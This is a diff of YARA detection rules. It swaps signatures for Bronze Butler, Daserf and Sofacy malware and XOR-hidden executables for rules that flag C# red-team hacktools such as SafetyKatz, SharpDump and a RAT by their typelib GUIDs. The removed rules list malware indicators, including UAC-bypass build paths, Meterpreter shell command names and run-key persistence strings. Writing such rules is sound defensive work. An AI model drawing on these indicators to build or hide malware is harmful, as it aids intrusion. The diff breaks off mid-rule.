-		logic_hash = "6fe7d1536db5fc30c9b4a171be66993fc69e6a1d96dae00be4170bdb4a53afb8"
-		score = 85
+		logic_hash = "32893d4396842c3df3756d7090a1e86bf73c5ad2476aab5d6c53db8bdae9c31a"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033"
-		hash2 = "7bcd4ec18fc4a56db30e0aaebd44e2988f98f7b5d8c14f6689f650b4f11e16c0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\ProgramData\\log.txt" wide fullword
-		$s2 = "Cleaner.dll" ascii fullword
-		$s3 = "-- system logical drive: " wide fullword
-		$s4 = "-- FAILED" wide fullword
-		$op1 = { 8b f1 80 3d b0 66 03 10 00 0f 85 96 00 00 00 33 c0 40 b9 a8 66 03 10 87 01 33 db }
-		$op2 = { 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 a2 c8 01 10 2b c1 6a 04 }
-		$op3 = { 8d 4d f4 ff 75 08 e8 12 ff ff ff 68 88 39 03 10 8d 45 f4 50 e8 2d 1d 00 00 cc }
+		$typelibguid0lo = "d1421ba3-c60b-42a0-98f9-92ba4e653f3d" ascii wide
+		$typelibguid1lo = "2afac0dd-f46f-4f95-8a93-dc17b4f9a3a1" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "a4b162717c197e11b76a4d9bc58ea25d" or 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Bronzebutler_Daserf_Delphi_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpspray : FILE
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "88372e62-3bba-58dc-825c-f35533e42825"
-		date = "2017-10-14"
-		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L13-L36"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e9312c96-be10-5942-a4da-1fe708cc6699"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/jnqpblc/SharpSpray"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L943-L956"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6034a6746a5bd762d869ad2e791d80aca8a1251afa9386d6b657f23092c6fc42"
+		logic_hash = "15ad567589656894f0da6ee56c26f48868936db015d0b41c04ccd6fd56f5753e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "89a80ca92600af64eb9c32cab4e936c7d675cf815424d72438973e2d6788ef64"
-		hash2 = "b1bd03cd12638f44d9ace271f65645e7f9b707f86e9bcf790e0e5a96b755556b"
-		hash3 = "22e1965154bdb91dd281f0e86c8be96bf1f9a1e5fe93c60a1d30b79c0c0f0d43"
 
 	strings:
-		$s1 = "Services.exe" fullword ascii
-		$s2 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
-		$s3 = "l32.dll" fullword ascii
-		$s4 = "tProcess:" fullword ascii
-		$s5 = " InjectPr" ascii
-		$s6 = "Write$Error creating variant or safe array\x1fInvalid argument to time encode" fullword wide
-		$s7 = "on\\run /v " fullword ascii
-		$s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run" fullword ascii
-		$s9 = "ms1ng2d3d2.exe" fullword ascii
+		$typelibguid0lo = "51c6e016-1428-441d-82e9-bb0eb599bbc8" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_Bronzebutler_Daserf_C_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Obfuscator : FILE
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "62a5cc4a-7c58-5e4d-ac23-8d1f850a540a"
-		date = "2017-10-14"
-		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L38-L78"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d9988b00-1f10-5421-8ffe-49849a5d5902"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/3xpl01tc0d3r/Obfuscator"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L958-L971"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0b0c05db41d6b6ac48b31d8c22aead301470f465c2840ddc98ed9577d0aaa50b"
+		logic_hash = "523ce9e83bd6cd7152d86fe77a441a3f721d79f8df45c4041e47cae4b15673d5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a4afd9df1b4cc014c3a89d7b4a560fa3e368b02286c42841762714b23e68cc05"
-		hash2 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
-		hash3 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
-		hash4 = "b1fdc6dc330e78a66757b77cc67a0e9931b777cd7af9f839911eecb74c04420a"
-		hash5 = "15abe7b1355cd35375de6dde57608f6d3481755fdc9e71d2bfc7c7288db4cd92"
-		hash6 = "85544d2bcaf8e6ca32bbc0a9e9583c9db1dce837043f555a7ff66363d5858439"
-		hash7 = "2dc24622c1e91642a21a64c0dd31cbe953e8f77bd3d6abcf2c4676c3b11bb162"
-		hash8 = "2bdb88fa24cffba240b60416835189c76a9920b6c3f6e09c3c4b171c2f57031c"
 
 	strings:
-		$s1 = "(c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com." fullword ascii
-		$s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)" fullword ascii
-		$a1 = "ndkkwqgcm" fullword ascii
-		$a2 = "RtlGetCo" fullword ascii
-		$a3 = "hutils" fullword ascii
-		$b1 = "%USERPROFILE%\\System" fullword ascii
-		$b2 = "msid.dat" fullword ascii
-		$b3 = "DRIVE_REMOTE" fullword wide
-		$b4 = "%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
-		$b5 = "jcbhe.asp" fullword ascii
-		$b6 = "edset.asp" fullword ascii
-		$b7 = "bxcve.asp" fullword ascii
-		$b8 = "hcvery.php" fullword ascii
-		$b9 = "ynhkef.php" fullword ascii
-		$b10 = "dkgwey.php" fullword ascii
+		$typelibguid0lo = "8fe5b811-a2cb-417f-af93-6a3cf6650af1" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "088382f4887e3b2c4bd5157f2d72b618" or all of ( $a* ) or 4 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Bronzebutler_Dget_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Safetykatz : FILE
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d60fcc9f-0f17-5871-9e8e-71d26e2f46bc"
-		date = "2017-10-14"
-		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L80-L93"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5f6d7432-0bb5-5782-98ec-2c2168f2fc1f"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/GhostPack/SafetyKatz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L973-L986"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d5537f581039fa4561950402a34cbd9abd54c167d659fbbe74f1cb83217e3fb"
+		logic_hash = "08b1e8ee951140dc6ac07f2646e0bf84bb22bea9948d231e1ba8d4cf0a28a2e8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bd81521445639aaa5e3bcb5ece94f73feda3a91880a34a01f92639f8640251d6"
 
 	strings:
-		$s2 = "DGet Tool Made by XZ" fullword ascii
+		$typelibguid0lo = "8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 10KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Bronzebutler_Uacbypass_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dropless_Malware : FILE
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "01853352-58fc-56a3-8c20-08405c71e251"
-		date = "2017-10-14"
-		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L95-L113"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0da3b6d8-2002-590e-a8d5-f6c84acfb083"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/Dropless-Malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L988-L1001"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "64b70b9f5963be9009025c14a6e98be9642599af5226f77946b6255116fc22d8"
+		logic_hash = "833b7758aea58d3065c2c3153f0ab21b7b6a54f7e7083655f2a52c2861080f7d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fe06b99a0287e2b2d9f7faffbda3a4b328ecc05eab56a3e730cfc99de803b192"
 
 	strings:
-		$x1 = "\\Release\\BypassUacDll.pdb" ascii
-		$x2 = "%programfiles%internet exploreriexplore.exe" fullword wide
-		$x3 = "Elevation:Administrator!new:{3ad055" fullword wide
-		$x4 = "BypassUac.pdb" fullword ascii
-		$x5 = "[bypassUAC] started X64" fullword wide
-		$x6 = "[bypassUAC] started X86" fullword wide
+		$typelibguid0lo = "23b739f7-2355-491e-a7cd-a8485d39d6d6" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Bronzebutler_Xxmm_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_UAC_Silentclean : FILE
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0e413e3a-fb61-58bc-9ecb-4ef76e83a7f3"
-		date = "2017-10-14"
-		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L115-L140"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2dde9632-10c5-5c91-8bd9-2fb80d6f0c49"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/EncodeGroup/UAC-SilentClean"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1003-L1016"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eb9c12cbe2fe132a9588b744d10caee12716f622c31da8a1cee4c0f88d693e8e"
+		logic_hash = "32d331148578923e7f5017ce874f9daa234a759ea5a87cbddc1e111834acf920"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7197de18bc5a4c854334ff979f3e4dafa16f43d7bf91edfe46f03e6cc88f7b73"
 
 	strings:
-		$x1 = "\\Release\\ReflectivLoader.pdb" ascii
-		$x3 = "\\Projects\\xxmm2\\Release\\" ascii
-		$x5 = "http://127.0.0.1/phptunnel.php" fullword ascii
-		$s1 = "xxmm2.exe" fullword ascii
-		$s2 = "\\AvUpdate.exe" wide
-		$s3 = "stdapi_fs_file_download" fullword ascii
-		$s4 = "stdapi_syncshell_open" fullword ascii
-		$s5 = "stdapi_execute_sleep" fullword ascii
-		$s6 = "stdapi_syncshell_kill" fullword ascii
+		$typelibguid0lo = "948152a4-a4a1-4260-a224-204255bfee72" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 4 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Bronzebutler_Rarstar_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Desktopgrabber : FILE
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "770270b3-6743-5efb-84d8-b63f1df800d9"
-		date = "2017-10-14"
-		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L142-L158"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "7db07291-d6d4-5527-a879-27f899dbd6fe"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/DesktopGrabber"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1018-L1031"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0e418e595020d91c575051c3b1639b09efad150c625b62eec3d1331f9792641b"
+		logic_hash = "1937fa6b9e5af3c12a2eef6356aed2c93e6534db492ebc7a8955c4cac240a840"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0fc1b4fdf0dc5373f98de8817da9380479606f775f5aa0b9b0e1a78d4b49e5f4"
 
 	strings:
-		$s1 = "Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.0;+SV1)" fullword wide
-		$s2 = "http://www.google.co.jp" fullword wide
-		$s3 = "16D73E22-873D-D58E-4F42-E6055BC9825E" fullword ascii
-		$s4 = "\\*.rar" ascii
+		$typelibguid0lo = "e6aa0cd5-9537-47a0-8c85-1fbe284a4380" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Daserf_Nov1_Bronzebutler : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Wsmanager : FILE
 {
 	meta:
-		description = "Detects Daserf malware used by Bronze Butler"
-		author = "Florian Roth (Nextron Systems)"
-		id = "58c4d3dc-c516-567b-8746-4e185c3cd328"
-		date = "2017-11-08"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/ffeCfd"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L170-L196"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b8c330dc-74aa-5a33-8af6-17c9beb8be81"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/guillaC/wsManager"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1033-L1046"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "75edc17c51f4ea82ff7722df2f5825721ff64445fb8c78b450f1333bd32b5829"
+		logic_hash = "cbcdcf8c4895263b881f45f54df01b6a6a3d76cf1be195475217ccffa9eedfed"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5ede6f93f26ccd6de2f93c9bd0f834279df5f5cfe3457915fae24a3aec46961b"
 
 	strings:
-		$x1 = "mstmp1845234.exe" fullword ascii
-		$x2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)" fullword ascii
-		$x3 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
-		$s1 = "Content-Type: */*" fullword ascii
-		$s2 = "ProxyEnable" ascii fullword
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer" ascii fullword
-		$s4 = "iexplore.exe" ascii fullword
-		$s5 = "\\SOFTWARE\\Microsoft\\Windows\\Cu" ascii
-		$s6 = "rrentVersion\\Internet Settings" fullword ascii
-		$s7 = "ws\\CurrentVersion\\Inter" fullword ascii
-		$s8 = "Documents an" fullword ascii
+		$typelibguid0lo = "9480809e-5472-44f3-b076-dcdf7379e766" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 5 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Sofacy_Jun16_Sample1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Uglyexe : FILE
 {
 	meta:
-		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "62b577e3-7ccb-59df-a944-96ffe9b16d3d"
-		date = "2016-06-14"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/mzAa97"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_jun16.yar#L10-L25"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5833e6c5-f078-5eb5-9519-76710d7da0e1"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/fashionproof/UglyEXe"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1048-L1061"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "761cec3d04e6b5273cfb450000023ed10ea73d17648c0af7660f4ef2b37fc31c"
-		score = 85
+		logic_hash = "caf7c8ae7060822e0014710e521020e5d502eedb505165374b7600b11dea7bad"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "be1cfa10fcf2668ae01b98579b345ebe87dab77b6b1581c368d1aba9fd2f10a0"
 
 	strings:
-		$s1 = "clconfg.dll" fullword ascii
-		$s2 = "ASijnoKGszdpodPPiaoaghj8127391" fullword wide
+		$typelibguid0lo = "233de44b-4ec1-475d-a7d6-16da48d6fc8d" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $s* ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Sofacy_Jun16_Sample2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdump : FILE
 {
 	meta:
-		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "21561e13-a190-565e-a08b-e6a07c84c3db"
-		date = "2016-06-14"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/mzAa97"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_jun16.yar#L27-L49"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b613092f-9006-5405-b07e-59737410ac1e"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/GhostPack/SharpDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1063-L1076"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a1f334996527556334c34d0308da6165e9d2a3d7eb8b2ecc322b574dea4d4844"
-		score = 85
+		logic_hash = "95217122df1b56132e7774c10c0e993d914cdf8e2463f949cfbab59cb0d99ca4"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "57d230ddaf92e2d0504e5bb12abf52062114fb8980c5ecc413116b1d6ffedf1b"
-		hash2 = "69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261"
-		hash3 = "aeeab3272a2ed2157ebf67f74c00fafc787a2b9bbaa17a03be1e23d4cb273632"
 
 	strings:
-		$x1 = "DGMNOEP" fullword ascii
-		$x2 = "/%s%s%s/?%s=" fullword ascii
-		$s1 = "Control Panel\\Dehttps=https://%snetwork.proxy.ht2" fullword ascii
-		$s2 = "http=http://%s:%Control Panel\\Denetwork.proxy.ht&ol1mS9" fullword ascii
-		$s3 = "svchost.dll" fullword wide
-		$s4 = "clconfig.dll" fullword wide
+		$typelibguid0lo = "79c9bba3-a0ea-431c-866c-77004802d8a0" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $x* ) ) ) or ( 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Sofacy_Jun16_Sample3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Educationalrat : FILE
 {
 	meta:
-		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f97bc840-0d9a-5a9e-9e13-7b7f8acc53a5"
-		date = "2016-06-14"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/mzAa97"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_jun16.yar#L51-L65"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b1d54bea-a6c4-5c57-9ee1-7438d503b01d"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/securesean/EducationalRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1078-L1091"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bdc6fcc30ebd7a966391747e4156a6d94dc9187e8b8898de4c441540ec4e637e"
-		score = 85
+		logic_hash = "c46fee5ff948537fb1defe636f3987b3de52b2e37a1130b4b425c6645d74b11b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785"
 
 	strings:
-		$s1 = "ASLIiasiuqpssuqkl713h" fullword wide
+		$typelibguid0lo = "8a18fbcf-8cac-482d-8ab7-08a44f0e278e" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and $s1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Two_Byte_XOR_PE_And_MZ : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Stealth_Kid_RAT : FILE
 {
 	meta:
-		description = "Look for 2 byte xor of a PE starting at offset 0"
-		author = "Wesley Shields <wxs@atarininja.org>"
-		id = "ddb87194-bafb-597d-9184-fe4fe3c5ce8d"
-		date = "2021-10-11"
-		modified = "2025-11-03"
-		reference = "https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xored_pe.yar#L1-L12"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f26e040a-dcc7-518f-89f2-3333f83fa14a"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/ctsecurity/Stealth-Kid-RAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1093-L1107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8a43ff9ec966df72ef35fb9ba9bbbd6f8b0f3761669bb91dc5919645d6327174"
-		score = 60
+		logic_hash = "9a885a48053d501273fc8043e990166558458239781feb9e09f972c52d57e8da"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$typelibguid0lo = "bf43cd33-c259-4711-8a0e-1a5c6c13811d" ascii wide
+		$typelibguid1lo = "e5b9df9b-a9e4-4754-8731-efc4e2667d88" ascii wide
 
 	condition:
-		uint16( 0 ) != 0x5a4d and uint32( ( uint16( 0x3c ) ^ ( uint16( 0 ) ^ 0x5a4d ) ) | ( ( uint16( 0x3e ) ^ ( uint16( 0 ) ^ 0x5a4d ) ) << 16 ) ) ^ ( ( uint16( 0 ) ^ 0x5a4d ) | ( ( uint16( 0 ) ^ 0x5a4d ) << 16 ) ) == 0x00004550
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Four_Byte_XOR_PE_And_MZ : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcradle : FILE
 {
-	meta:
-		description = "Look for 4 byte xor of a PE starting at offset 0"
-		author = "Wesley Shields <wxs@atarininja.org>"
-		id = "d7b4b462-dfde-5d1f-8039-63522436c15f"
-		date = "2021-10-11"
-		modified = "2025-11-03"
-		reference = "https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xored_pe.yar#L14-L27"
+	meta:
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e2123a73-2609-559d-a122-923ebf8fd668"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/anthemtotheego/SharpCradle"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1109-L1122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
